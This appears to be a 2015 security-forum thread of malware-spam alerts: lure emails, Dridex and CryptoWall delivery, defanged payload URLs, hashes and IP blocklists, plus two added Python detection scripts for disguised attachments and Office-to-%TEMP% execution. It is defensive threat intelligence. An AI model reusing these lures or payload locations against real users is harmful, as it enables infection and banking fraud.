9 June 2015 - "'Password Confirmation [742263403307] T82' pretending to come from steve.tasker81@ thomashiggins .com with a malicious word doc or Excel XLS spreadsheet attachment is another one from the current bot runs... The email (which has random numbers in the subject) looks like:
Full document is attached
09 June 2015: 1913.doc - Current Virus total detections: 2/57*
... which connects to and downloads a Dridex banking malware from speakhighly .com/42/11.exe (VirusTotal**)... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en-gb/file/9dc725615952bb0601fc957a3b05428d9407bdaaebefaaea78e9f46c6592e9e3/analysis/1433841783/
** https://www.virustotal.com/en-gb/file/fdfac3eac11bdca01c3d562a529b9d6b9d63b573ca9b907bbf8bb7fd8f9fdce1/analysis/1433842088/
... Behavioural information
TCP connections
173.230.130.172: https://www.virustotal.com/en-gb/ip-address/173.230.130.172/information/
5.178.43.48: https://www.virustotal.com/en-gb/ip-address/5.178.43.48/information/
speakhighly .com: 77.73.6.74: https://www.virustotal.com/en-gb/ip-address/77.73.6.74/information/
- http://blog.dynamoo.com/2015/06/malware-spam-password-confirmation.html
9 June 2015
"... Recommended blocklist:
173.230.130.172
94.23.53.23
31.186.99.250 "
___
Fake 'Unpaid invoice' SPAM – doc/xls malware
- http://myonlinesecurity.co.uk/unpaid-invoice-debbie-spencer-burgoynes-lyonshall-ltd-word-doc-or-excel-xls-spreadsheet-malware/
9 June 2015 - "'Unpaid invoice' pretending to come from Debbie Spencer <Debbie@ burgoynes-lyonshall .co .uk> with a malicious word doc or Excel XLS spreadsheet attachment is another one from the current bot runs... The email looks like:
Hi
Could you let me know when the attached will be paid?
Many thanks
Debbie
Deborah Spencer
Company Accountant
Burgoynes (Lyonshall) Ltd
Lyonshall
Kington
Herefordshire HR5 3JR
01544 340283 ...
The malware in this email is exactly the -same- as described in today’s earlier malspam run with word docs 'Password Confirmation [742263403307] T82 – word doc or excel xls spreadsheet malware'*... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* http://myonlinesecurity.co.uk/password-confirmation-742263403307-t82-word-doc-or-excel-xls-spreadsheet-malware/
___
The HTTPS-Only Standard
- https://https.cio.gov/
___
Beware of Emails Bearing Gifts
- http://www.darkreading.com/partner-perspectives/intel/beware-of-emails-bearing-gifts-/a/d-id/1320769
6/9/2015 - "Crime gangs are building very legitimate-looking emails as cover for phishing and ransomware, and they are having enough success that the attacks are escalating. In the first quarter of 2015, McAfee Labs registered a 165% increase in new ransomware driven largely by the new, hard-to-detect CTB-Locker ransomware family, new ransomware families such as Teslacrypt and TOX, and the emergence of new versions of CryptoWall, TorrentLocker, and BandarChor. Dell Secureworks* believes the ransomware business truly pays, with CryptoWall reaching at least 1 million victims and collecting about $1.8 million in ransom. The growth of ransomware is likely to continue to surge given the rise of new “business models,” the growing availability and ease of operation of newer ransomware kits, and the general increase in tactical sophistication. For instance, CTB-Locker possesses clever techniques for evading security software, higher-quality phishing emails, and an “affiliate” program that offers accomplices a percentage of ransom payments in return for flooding cyberspace with CTB-Locker phishing messages. In the case of TOX, ransomware is going the way of other malware, delivered in turnkey ransomware packages, simplifying the development, launch, and ongoing operation of ransomware campaigns. And where fewer technical skills are required, you have an increase of less-skilled perpetrators getting into a cybercrime business... Phishing and ransomware attacks are hardly new, but the rapid changes in malware code and the legitimate-looking emails are making it harder for both users and antivirus programs to detect the surprise waiting at the other end of the link. No single security solution provides an adequate defense. When malware can sneak through a network firewall, lie low to trick a sandbox, and evade endpoint antivirus, a thorough defense requires the combined resources of a security-connected framework."
* http://www.secureworks.com/cyber-threat-intelligence/threats/teslacrypt-ransomware-threat-analysis/
___
Flash malware jumps over 300 percent - Q1-2015
- http://www.theinquirer.net/inquirer/news/2412279/adobe-flash-malware-jumps-over-300-percent-in-first-quarter-of-2015
Jun 09 2015 - "MALWARE ATTACKS on the Adobe Flash platform rose by a horrifying 317 percent in the first quarter of 2015. New figures in the McAfee Labs Threats Report May 2015 (PDF*) show that the number of recorded Flash malware instances was almost 200,000 in Q1 2015, compared with 47,000 in Q4 2014...
* http://www.mcafee.com/us/resources/reports/rp-quarterly-threat-q1-2015.pdf
Spam continues ever onward with six trillion messages sent in Q1. A total of 1,118 spam domains were discovered in the UK alone, beating Russia (1,104) and Japan (1,035). Phishing domains hit 887 in the UK, compared with France (799) and the Netherlands (680). Overall, McAfee Labs observed 362 phishing attacks a minute, or six every second..."
:fear::fear: :mad:
AplusWebMaster
2015-06-10, 14:26
FYI...
Fake 'BTT telephone bill' SPAM – doc/xls malware
- http://myonlinesecurity.co.uk/your-monthly-btt-telephone-bill-hayley-sweeney-word-doc-or-excel-xls-spreadsheet-malware/
10 Jun 2015 - "'Your monthly BTT telephone bill' pretending to come from Hayley Sweeney <admins@ bttcomms .com> with a malicious word doc or Excel XLS spreadsheet attachment is another one from the current bot runs... The email looks like:
Please find attached your telephone bill for last month. This message was sent automatically.
For any queries relating to this bill, please contact Customer Services on 01536 211100.
10 June 2015 : Invoice_68362.doc - Current Virus total detections: 5/57*
... Which downloads a Dridex banking malware from www .jimaimracing .co.uk/64/11.exe (VirusTotal**)... The basic rule is NEVER open any attachment to an email, unless you are expecting it... Never just blindly click on the file in your email program..."
* https://www.virustotal.com/en/file/bba2cce71f9c253a34dae8887effeff97874ee3a941f2fa42015aea04f581168/analysis/1433931273/
** https://www.virustotal.com/en/file/3a978d2ac64e1d7906d3df3febe0d54700c3298e6936bfb02e010d19d008e3dc/analysis/1433932505/
jimaimracing .co.uk: 91.194.151.37: https://www.virustotal.com/en/ip-address/91.194.151.37/information/
- http://blog.dynamoo.com/2015/06/malware-spam-hayley-sweeney.html
10 June 2015
"... Recommended blocklist:
173.230.130.172
94.23.53.23
176.99.6.10 "
:fear::fear::mad:
AplusWebMaster
2015-06-11, 13:29
FYI...
Fake 'order reference' SPAM - PDF malware
- http://myonlinesecurity.co.uk/your-order-reference-is-05806-fake-pdf-malware/
11 Jun 2015 - "'Your order reference is 05806' pretending to come from inform <john.wade@ precisionclubs .com> with a zip attachment is another one from the current bot runs... The email looks like:
Dear client,
Thank you for the order,
your credit card will be charged for 312 dollars.
For more information, please visit our web site ...
Best regards, ticket service.
Tel./Fax.: (828) 012 88 840
11 June 2015: payment_n09837462_pdf.zip:
Extracts to: payment_n09837462_pdf_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _.exe
Current Virus total detections: 5/57*. Note the series of _ after the pdf. That is designed to try to fool you into thinking that the .exe file is a pdf so you open it. Most Windows computers won’t show the .exe in Windows Explorer if enough spaces or _ are inserted. This is another one of the spoofed icon files that, unless you have “show known file extensions” enabled, will look like a proper PDF file instead of the .exe file it really is, making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en-gb/file/a061c5d3e0a14ac1394afbca5b7df97f44a30a8ba6a4e4ae7f9c3518d33b9675/analysis/1434002812/
___
Fake 'New_Order' email / Phish...
- http://blog.dynamoo.com/2015/06/phish-neworder056253hfconstructions.html
11 Jun 2015 - "I've seen a few of these today, presumably they aren't quite spammy enough to get blocked by our mail filters. The attachment is New_Order_#056253_Hf_Constructions.pdf which looks like a purchase order, but there is a blurred out section:
Screenshot: https://4.bp.blogspot.com/-4adKeKIur7k/VXlOx3_HqAI/AAAAAAAAGrE/hCE8BPkBVUY/s640/hf-1.jpg
An examination of the underlying PDF file shows two URLs... In turn these redirect... The second URL listed 404s, but the first one is active. According to the URLquery report*, it looks harmless, just leading to a phishing page. But when I tried it in a test environment, the behaviour was somewhat different and it also attempted to load a page... This page 404s, but was previously hosted on a bad server at 92.222.42.183 [VT report**]. That server has been offline for a few days, but the URL is suggestive of an exploit kit of some sort. The "megatrading .hol.es" (hosted on 31.220.16.16 by Hostinger - VT report***) landing page looks like a straightforward phish:
Screenshot: https://4.bp.blogspot.com/-lsN0K-Cu2lU/VXlQkDH1haI/AAAAAAAAGrQ/TZdb5jkiODk/s640/hf-2.png
Entering the username and password always seems to return an error, even if you are absolutely certain the combination is correct:
> https://2.bp.blogspot.com/-R9BG4uiZ_eQ/VXlQ92ukk-I/AAAAAAAAGrY/sSh3U4RhHjg/s320/hf-3.png
I suspect that all this portion is doing is collecting email addresses and passwords for use later. Webmail accounts have some value to the bad guys, and of course many people re-use passwords all over the place, so it could be used as a way to get access to other services. Take care.
Recommended blocklist:
31.220.16.16
92.222.42.183 "
* http://urlquery.net/report.php?id=1434011774093
** https://www.virustotal.com/en/ip-address/92.222.42.183/information/
*** https://www.virustotal.com/en/ip-address/31.220.16.16/information/
___
Mystery continues to surround the nude celebrity iCloud hack
- http://www.hotforsecurity.com/blog/mystery-continues-to-surround-the-nude-celebrity-icloud-hack-11990.html
June 11, 2015 - "Sure, companies and governments get hacked all the time. But for the mainstream media to *really* take an interest, you need to add a twist of celebrity (preferably nude and female). That’s what happened last year when the so-called 'Fappening' saw the intimate and private photographs of scores of female celebrities and actresses, many of them topless or nude, leak onto 4Chan and the seedier corners of Reddit. Famous names who had their privacy violated by the leak included Jennifer Lawrence, Kate Upton, Victoria Justice, Kirsten Dunst, Hope Solo, Krysten Ritter, Yvonne Strahovski, Teresa Palmer, Ariana Grande, and Mary Elizabeth Winstead, amongst many others... Gawker has revealed a search warrant and affidavit, revealing that the FBI has seized computers belonging to a Chicago man in connection with the hack. And it appears that the documents back Apple’s claim that their iCloud service did -not- suffer a breach as such, but instead was the victim of a targeted attack after celebrities’ passwords and security questions were determined. In the affidavit, FBI cybercrime special agent Josh Sadowsky says that an IP address assigned to one Emilio Herrera was “used to access approximately 572 unique iCloud accounts” between May 13 2013 and August 31 2014. According to the statement, a number of the accounts accessed belonged to celebrities who had photos leaked online. In all, iCloud accounts were accessed -3,263- times from the IP address. In addition, the IP address was used from a computer running Windows 7 to reset -1,987- unique iCloud account passwords. Unsurprisingly, law enforcement officers visited Herrera’s house in Chicago and walked away with computers, phones, SD cards, and other devices that no doubt they planned to submit to forensic scrutiny. In particular they would be interested in uncovering any evidence of activity which might suggest phishing, the usage of hacking tools or email forwarding.
But here’s where things get interesting. According to Gawker, Herrera has -not- been charged with any crime and is not even considered a suspect at this point. It would certainly be surprising if someone involved in such an industrial-scale account hijacking operation would not have taken elementary steps to hide their true IP address, so is it possible that Herrera’s computers were being used by the hackers of nude celebs’ iCloud accounts -without- Herrera’s knowledge or permission? If that is the case, then it’s yet another reason why all computer users need to learn the importance of proper computer security. Keeping your computer protected with a layered defence and patched against the latest vulnerabilities reduces the chance of a remote hacker gaining control of your PC. Because the very last thing you want is to be implicated in a crime that you didn’t commit, because hackers have been able to commandeer your computer for their own evil ends."
- Graham Cluley
:fear::fear::mad:
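The 'order reference' post above describes two of the tricks these runs rely on: a run of spaces or underscores that pushes the real .exe extension out of view in Explorer, and a document extension buried in the name of an executable. The following is an added example (not code from the quoted blog) of the attachment-name checks a mail gateway or triage script can apply, including looking inside a zip and sniffing the first bytes of each member so a file called brochure.pdf that is really a PE is caught too. The shortened padded name and the zip contents are constructed for the example; the real attachment names quoted above (Invoice_store.exe, New_docs.exe, PI-ORDER.exe) are used as test inputs.

```python
"""Flag attachment names that disguise an executable as a document.

Added example; the padded name is a shortened form of the one quoted above and the zip is constructed.
"""
import io
import re
import zipfile
from typing import List, Optional, Tuple

# Extensions Windows will execute when double-clicked (a common gateway block set).
EXECUTABLE_EXTS = {"exe", "scr", "com", "pif", "bat", "cmd", "js", "jse", "vbs", "vbe", "wsf", "hta", "cpl"}
# Extensions that attackers embed in a name to make the file look like a document or image.
DOCUMENT_EXTS = {"pdf", "doc", "docx", "xls", "xlsx", "ppt", "pptx", "txt", "rtf", "jpg", "jpeg", "png"}
# Four or more filler characters in a row: "report_ _ _ _ _.exe" or "invoice.pdf          .exe".
PADDING_RE = re.compile(r"[\s_.\-]{4,}")
PE_MAGIC = b"MZ"


def classify_attachment(name: str) -> Optional[str]:
    """Return a short reason string if `name` looks like a disguised or bare executable, else None."""
    base = name.rsplit("/", 1)[-1].rsplit("\\", 1)[-1]  # zip members and Windows paths
    parts = base.lower().split(".")
    if len(parts) < 2:
        return None
    ext = parts[-1].strip()
    if ext not in EXECUTABLE_EXTS:
        return None
    stem = ".".join(parts[:-1])
    reasons: List[str] = []
    if PADDING_RE.search(stem):
        reasons.append("filler padding before the real extension")
    hint = [tok for tok in re.split(r"[._\s\-]+", stem) if tok in DOCUMENT_EXTS]
    if hint:
        reasons.append(f"document extension '{hint[0]}' embedded in the name")
    if not reasons:
        reasons.append("bare executable attachment")
    return f"executable '.{ext}': " + "; ".join(reasons)


def scan_zip(data: bytes) -> List[Tuple[str, str]]:
    """Return (member_name, reason) for every zip member that is, or hides, an executable.

    Members whose name looks harmless are content-sniffed: a PE file starts with 'MZ'
    whatever its extension says.
    """
    findings: List[Tuple[str, str]] = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            reason = classify_attachment(info.filename)
            if reason is None:
                with zf.open(info) as fh:
                    if fh.read(len(PE_MAGIC)) == PE_MAGIC:
                        reason = "non-executable name but PE (MZ) content"
            if reason:
                findings.append((info.filename, reason))
    return findings


def build_sample_zip() -> bytes:
    """Constructed zip: a padded fake-PDF .exe, a .pdf that is really a PE, and a harmless text file."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("payment_n09837462_pdf_ _ _ _ _ _.exe", PE_MAGIC + b"\x00" * 62)
        zf.writestr("brochure.pdf", PE_MAGIC + b"\x00" * 62)
        zf.writestr("notes.txt", b"plain text, nothing to see")
    return buf.getvalue()


if __name__ == "__main__":
    for member, why in scan_zip(build_sample_zip()):
        print(f"{member!r}: {why}")
```

The checks are deliberately name-based plus a two-byte content sniff, so they cost nothing at the gateway; the padding threshold of four filler characters avoids flagging ordinary names such as "report - v2.exe" while still catching the long runs of underscores the post describes.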
AplusWebMaster
2015-06-12, 14:34
FYI...
Fake 'Confirmation transfer' SPAM - PDF malware
- http://myonlinesecurity.co.uk/hsbc-confirmation-of-the-transfer-fake-pdf-malware/
12 June 2015 - "'Confirmation of the transfer' pretending to come from HSBC (random name@random email address) with a zip attachment is another one from the current bot runs... The email looks like:
Transfer:
Number of Transfer: 359880-67692630-94464
To: [redacted]
Bank sender: HSBS
Country Poster: England
City Poster: London
12 June 2015: transfer-England-359880-67692630-94464.zip(random numbers):
Extracts to: New_docs.exe - Current Virus total detections: 4/57*
This is another one of the spoofed icon files that, unless you have “show known file extensions” enabled, will look like a proper PDF file instead of the .exe file it really is, making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en-gb/file/344e0085ce3bce73846c8705a907da4fc04d4f7c0fc70f10a161e1d176c919a0/analysis/1434111878/
... Behavioural information
TCP connections
64.182.208.183: https://www.virustotal.com/en-gb/ip-address/64.182.208.183/information/
188.120.194.101: https://www.virustotal.com/en-gb/ip-address/188.120.194.101/information/
24.19.25.40: https://www.virustotal.com/en-gb/ip-address/24.19.25.40/information/
88.221.14.249: https://www.virustotal.com/en-gb/ip-address/88.221.14.249/information/
___
Malvertising 'Pop-under ads' lead to CryptoWall
- https://blog.malwarebytes.org/malvertising-2/2015/06/popcash-malvertising-leads-to-cryptowall-3-0/
June 11, 2015 - "... malvertising leverages the infrastructure provided by ad networks to distribute malicious content to end users while they browse the Internet... a prolific ad network (over 180M hits/month according to SimilarWeb) being used by online fraudsters to distribute malware and other nuisances. 'Popcash' is a pop-under ad network that offers services for both publishers and advertisers: https://blog.malwarebytes.org/wp-content/uploads/2015/06/popcashlogo.png
'Pop-under ads are similar to pop-up ads, but the ad window appears -hidden- behind the main browser window rather than superimposed in front of it... They usually remain -unnoticed- until the main browser window is closed or minimized, leaving the user’s attention free for the advertisement... users therefore react 'better' to pop-under advertising than to pop-up advertising because of this different, delayed 'impression'. — Wikipedia**
** https://en.wikipedia.org/wiki/Pop-up_ad#Pop-under_ads
... In this case, we received a URL used as a gate to an exploit kit:
> https://blog.malwarebytes.org/wp-content/uploads/2015/06/redirection.png
The Magnitude EK starts with a simplified landing page that contains the code to launch a Flash exploit and an iframe to perform an Internet Explorer exploit... The Flash exploit (VT)[3] is CVE-2015-3090 as reported on malware.dontneedcoffee[4]:
3] https://www.virustotal.com/en/file/0d818f1ba3154902413b6ed1da318734668d1dac331d45077e63ff8b6d789e7f/analysis/1434044838/
4] http://malware.dontneedcoffee.com/2015/05/cve-2015-3090-flash-up-to-1700169-and.html
... The Internet Explorer exploit (CVE-2014-6332 or CVE-2013-2551 thanks @kafeine) is prepared via a heavily encoded piece of JavaScript... Several URLs are loaded but only a couple actually loaded the same binary (VT)[5] detected by Malwarebytes Anti-Malware as Trojan.Dropper.Necurs, which eventually loads CryptoWall 3.0... other slots are available and could be filled with different malware families by the exploit kit operator...
5] https://www.virustotal.com/en/file/54bbabf037f1fa695a86246e1bf947a232fa1fcd261638affcdfdbd0d931bf48/analysis/1434001814/
... CryptoWall 3.0: Magnitude EK, just like many other exploit kits recently, is pushing crypto ransomware, possibly one of the worst strains of malware because it uses genuine encryption to lock down a user’s personal files. Soon after the ransomware takes over the PC, it will prompt a message warning of what just happened and giving details on how to proceed:
> https://blog.malwarebytes.org/wp-content/uploads/2015/06/HELP_DECRYPT.png
In this case, one needs to pay $500 to get their files back within the deadline, otherwise that amount doubles:
> https://blog.malwarebytes.org/wp-content/uploads/2015/06/BT.png
Conclusions: Because malvertising involves multiple players in order to work (publishers, ad networks, visitors) each has its own role to play in combatting this problem. Publishers (should) be wise in choosing their third-party advertisers by choosing reputable ones (although it is not a 100% guarantee (nothing is) that incidents will not happen). Ad networks can and should also ensure that the traffic they serve is clean. We contacted Popca$h on two separate occasions through their official “report malware” page, but -never- received a response... The campaign is still -ongoing- and not only serving exploits but -also- tech support scams[6] customized for your browser, ISP, city, etc:
6] https://blog.malwarebytes.org/wp-content/uploads/2015/06/warning.png "
(More detail at the malwarebytes URL at the top of this post.)
- http://windowssecrets.com/patch-watch/no-summer-break-from-ms-office-updates/
June 11, 2015 - "... Flash Player 18.0.0.160 addresses 13 vulnerabilities, some of which have already been used in ransomware attacks..."
:fear::fear::fear: :mad:
AplusWebMaster
2015-06-15, 14:33
FYI...
Fake 'Payment Confirmation' SPAM - doc/xls malware
- http://blog.dynamoo.com/2015/06/malware-spam-payment-confirmation.html
15 Jun 2015 - "This fake financial spam does not come from Reed, but is instead a simple forgery with a malicious attachment:
From: reed .co.uk Credit Control [mailto:creditcontrol.rol@ reed .co.uk]
Sent: Monday, June 15, 2015 11:10 AM
Subject: Payment Confirmation 29172230
Dear Sirs,
Many thanks for your card payment. Please find payment confirmation attached below.
Should you have any queries, please do not hesitate to contact Credit Control Team on 0845 241 9293.
Kind Regards
Credit Control Team
T: 020 7067 4584
F: 020 7067 4628
Email: creditcontrol.rol@ reed .co.uk
The only sample I have seen so far has an attachment 29172230_15.06.15.doc [detection rate 3/57*] which contains this malicious macro... which downloads a component from the following location:
http ://www .freewebstuff .be/34/44.exe
This is saved as %TEMP%\ginkan86.exe and has a VirusTotal detection rate of 6/57**. There will probably be other download locations, but they should all lead to an identical binary. Automated analysis tools... show traffic to the following IPs:
136.243.14.142 (Hetzner, Germany)
71.14.1.139 (Charter Communications, US)
173.230.130.172 (Linode, US)
94.23.53.23 (OVH, France)
176.99.6.10 (Global Telecommunications Ltd, Russia)
According to this Malwr report[3], it also drops a Dridex DLL with a detection rate of 18/57[4].
Recommended blocklist:
136.243.14.142
71.14.1.139
173.230.130.172
94.23.53.23
176.99.6.10 "
* https://www.virustotal.com/en/file/b8ca4236c9461e40b9eb806b91bfda8c41691e71d43dc4b4ba68b0009de9df62/analysis/1434362701/
** https://www.virustotal.com/en/file/0532fdda6923b20813aa7fcd2016395fc3284a6ece7909a36d8c345d896fbfed/analysis/1434362861/
3] https://malwr.com/analysis/NDI1OGY0NTVjYTkxNGVjOWFiZjQ3MTA0YzFlMzk2MDA/
4] https://www.virustotal.com/en/file/0532fdda6923b20813aa7fcd2016395fc3284a6ece7909a36d8c345d896fbfed/analysis/1434362861/
freewebstuff .be: 46.21.172.135: https://www.virustotal.com/en-gb/ip-address/46.21.172.135/information/
- http://myonlinesecurity.co.uk/payment-confirmation-reed-co-uk-credit-control-word-doc-or-excel-xls-spreadsheet-malware/
15 Jun 2015
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/06/reed-payment-confirmation.png
> https://www.virustotal.com/en-gb/file/b8ca4236c9461e40b9eb806b91bfda8c41691e71d43dc4b4ba68b0009de9df62/analysis/1434364970/
___
Fake 'Nyfast Payment' SPAM – doc/xls malware
- http://myonlinesecurity.co.uk/nyfast-payment-accepted-word-doc-or-excel-xls-spreadsheet-malware/
15 Jun 2015 - "'[Nyfast] Payment accepted' pretending to come from Nyfast <sales@ nyfast .com> with a malicious word doc or Excel XLS spreadsheet attachment is another one from the current bot runs...
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/06/nyfast.png
15 June 2015: 101153.doc - Current Virus total detections: 3/57*
... Which connects to and downloads Dridex banking malware from http ://webbouw .be/34/44.exe ( VirusTotal**)... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en-gb/file/4b8a883a69576f6b80e1b304c462ee027b57dfa379f53ab7611d11f743e699cf/analysis/1434364039/
** https://www.virustotal.com/en-gb/file/0532fdda6923b20813aa7fcd2016395fc3284a6ece7909a36d8c345d896fbfed/analysis/1434362861/
webbouw .be: 46.21.172.135: https://www.virustotal.com/en/ip-address/46.21.172.135/information/
___
Fake 'PI-ORDER' SPAM – PDF malware
- http://myonlinesecurity.co.uk/pi-order-suiming-group-fake-pdf-malware/
15 Jun 2015 - "'PI-ORDER' with a zip attachment pretending to come from suiming <suiminggroup@ cs .ename .net> is another one from the current bot runs... The email looks like:
Dear Sir/madam,
Find attached our purchase order. Kindly quote us best price and send us proforma invoice asap, so that we can proceed with the necessary payment. Kindly confirm the PO and send PI asap.
kind Regards
suiming Group
15 June 2015: PI-ORDER.zip: Extracts to: PI-ORDER.exe - Current Virus total detections: 9/57*
This is another one of the spoofed icon files that, unless you have “show known file extensions” enabled, will look like a proper PDF file instead of the .exe file it really is, making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en-gb/file/5002420dec1e426f5daeb4b68ebac2139ccdd2e92b3554ac5400ca6b2dbcd797/analysis/1434339886/
___
Fake 'New Doc' SPAM - doc/xls malware
- http://myonlinesecurity.co.uk/will-kinghan-henryhowardfinance-co-uk-new-doc-word-doc-or-excel-xls-spreadsheet-malware/
15 Jun 2015 - "'Will Kinghan henryhowardfinance .co .uk New Doc' pretending to come from Will Kinghan <WKinghan@hhf .uk .com> with a malicious word doc or Excel XLS spreadsheet attachment is another one from the current bot runs...
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/06/new-doc-will-kinghan.png
15 June 2015 : New doc.doc ... which is the -same- malware as described in today’s other word doc malspam runs Payment Confirmation reed .co .uk Credit Control* – word doc or excel xls spreadsheet malware and [Nyfast] Payment accepted** – word doc or excel xls spreadsheet malware... The basic rule is NEVER open any attachment to an email, unless you are expecting it... Never just blindly click on the file in your email program..."
* http://myonlinesecurity.co.uk/payment-confirmation-reed-co-uk-credit-control-word-doc-or-excel-xls-spreadsheet-malware/
** http://myonlinesecurity.co.uk/nyfast-payment-accepted-word-doc-or-excel-xls-spreadsheet-malware/
___
'Let us help you make your online banking with HSBC more secure' - PHISH
- http://myonlinesecurity.co.uk/let-us-help-you-make-your-online-banking-with-hsbc-more-secure-phishing/
15 Jun 2015 - "An email saying 'Let us help you make your online banking with HSBC more secure' is one of today’s -phishing- attempts. There are a few major common subjects in a phishing attempt. The majority are either PayPal or your Bank or Credit Card, with a message saying something like:
- There have been unauthorised or suspicious attempts to log in to your account, please verify
- Your account has exceeded its limit and needs to be verified
- Your account will be suspended !
- You have received a secure message from < your bank>
- We are unable to verify your account information
- Update Personal Information
- Urgent Account Review Notification
- We recently noticed one or more attempts to log in to your PayPal account from a foreign IP address
- Confirmation of Order
... It will NEVER be a genuine email from PayPal or your bank, so don’t ever fill in the html (webpage) form that comes attached to the email. Some versions of this phish will have a link to a website that looks at first glance like the genuine bank website. That is also false... The link in the email directs you to a -fake- site; if you look at the fake website, you would be very hard-pressed to tell the difference between the fake one and the genuine site. The -only- way is to look at the address bar: on the genuine PayPal site, when using Internet Explorer the entire address bar is green (in Chrome or Firefox, only the padlock symbol on the left of the browser is green):
>> http://myonlinesecurity.co.uk/wp-content/uploads/2015/06/HSBC_phish_site.png
... luckily the phishing site has been deactivated by the webhosts, but be careful and remember that banks don’t send emails saying 'follow-the-link' to change anything..."
___
Fake 'Notice DHL' SPAM - PDF malware
- http://myonlinesecurity.co.uk/hsbc-notice-dhl-fake-pdf-malware/
15 Jun 2015 - "'Notice DHL' pretending to come from HSBC (random name @ random email address) with a zip attachment is another one from the current bot runs... The waybill number is random in each email but -matches- the attachment name. The email looks like:
Notice DHL
Courier our company was unable to deliver the goods.
CAUSE: was lost your number
Delivery Status: Active
Services: delivery in one day
Waybill number for your cargo: WL4OY-k5qvML-0136
Special sticker attached to the letter. Print sticker and show it in your post office.
15 June 2015: Sticker-WL4OY-k5qvML-0136.zip: Extracts to: New_docs.exe
Current Virus total detections: 1/57*. This is another one of the spoofed icon files that, unless you have “show known file extensions” enabled, will look like a proper PDF file instead of the .exe file it really is, making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en-gb/file/5f8d5f4812bfcf0180616eedb27d8eab9bc9eb37d89addb9911f0a9632147279/analysis/1434373340/
:fear::fear::mad:
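The Reed 'Payment Confirmation' post above spells out the behaviour that makes these macro documents detectable on the endpoint: Word runs a macro, the macro fetches an .exe, saves it under %TEMP% (ginkan86.exe in that sample) and runs it, and a Dridex DLL is dropped alongside. The following is an added example (not code from dynamoo.com) of two detection rules over process-creation and file-creation events in a simplified Sysmon-like JSON shape: an Office application writing an executable, and an Office application spawning a child from a temp directory. The events, the user name and the Office paths are constructed; only the ginkan86.exe file name and the document name come from the post.

```python
"""Detect the 'Office macro downloads and runs an executable from %TEMP%' pattern.

Added example; events are constructed in a simplified Sysmon-like shape (EventID 1 = process
creation, EventID 11 = file creation). Only ginkan86.exe and the .doc name come from the post.
"""
import json
import ntpath
from typing import Dict, List

OFFICE_IMAGES = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
TEMP_MARKERS = ("\\appdata\\local\\temp\\", "\\windows\\temp\\")
EXEC_SUFFIXES = (".exe", ".dll", ".scr", ".com", ".pif")

# Constructed newline-delimited JSON events for one infected session (user 'alice' is made up).
SAMPLE_EVENTS = r"""
{"EventID": 1, "Image": "C:\\Program Files\\Microsoft Office\\Office15\\WINWORD.EXE", "ParentImage": "C:\\Program Files\\Microsoft Office\\Office15\\OUTLOOK.EXE", "CommandLine": "WINWORD.EXE /n 29172230_15.06.15.doc"}
{"EventID": 11, "Image": "C:\\Program Files\\Microsoft Office\\Office15\\WINWORD.EXE", "TargetFilename": "C:\\Users\\alice\\AppData\\Local\\Temp\\ginkan86.exe"}
{"EventID": 1, "Image": "C:\\Users\\alice\\AppData\\Local\\Temp\\ginkan86.exe", "ParentImage": "C:\\Program Files\\Microsoft Office\\Office15\\WINWORD.EXE", "CommandLine": "C:\\Users\\alice\\AppData\\Local\\Temp\\ginkan86.exe"}
{"EventID": 1, "Image": "C:\\Windows\\splwow64.exe", "ParentImage": "C:\\Program Files\\Microsoft Office\\Office15\\WINWORD.EXE", "CommandLine": "C:\\Windows\\splwow64.exe 12288"}
{"EventID": 1, "Image": "C:\\Windows\\System32\\notepad.exe", "ParentImage": "C:\\Windows\\explorer.exe", "CommandLine": "notepad.exe"}
"""


def load_events(text: str) -> List[Dict]:
    """Parse newline-delimited JSON, skipping blank lines."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def is_office(image: str) -> bool:
    """True when the image is one of the Office executables (path and case insensitive)."""
    return ntpath.basename(image).lower() in OFFICE_IMAGES


def in_temp(path: str) -> bool:
    """True when the path sits under a user or system temp directory."""
    lowered = path.lower()
    return any(marker in lowered for marker in TEMP_MARKERS)


def detect(events: List[Dict]) -> List[Dict]:
    """Apply both rules and return one alert dict per matching event, in event order."""
    alerts: List[Dict] = []
    for ev in events:
        eid = ev.get("EventID")
        image = ev.get("Image", "")
        if eid == 11 and is_office(image) and ev.get("TargetFilename", "").lower().endswith(EXEC_SUFFIXES):
            # Rule 1: Word/Excel/Outlook wrote an executable or DLL to disk.
            alerts.append({"rule": "office_writes_executable", "image": image, "target": ev["TargetFilename"]})
        elif eid == 1 and is_office(ev.get("ParentImage", "")) and in_temp(image):
            # Rule 2: Word/Excel/Outlook started a child process living in a temp directory.
            # Legitimate children such as splwow64.exe live under C:\Windows and do not match.
            alerts.append({"rule": "office_child_from_temp", "image": image, "parent": ev["ParentImage"]})
    return alerts


if __name__ == "__main__":
    for alert in detect(load_events(SAMPLE_EVENTS)):
        print(json.dumps(alert))
```

Rule 2 keys on the parent/child relationship rather than on a file name, so it holds across the daily renamed payloads these posts record (44.exe, 11.exe, 10.exe); rule 1 catches the drop even when the execution is blocked, and both leave ordinary Office children such as the print spooler helper alone.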
AplusWebMaster
2015-06-16, 15:21
FYI...
Magnitude Exploit Kit uses Newly Patched Adobe Vuln ...
- http://blog.trendmicro.com/trendlabs-security-intelligence/magnitude-exploit-kit-uses-newly-patched-adobe-vulnerability-us-canada-and-uk-are-most-at-risk/
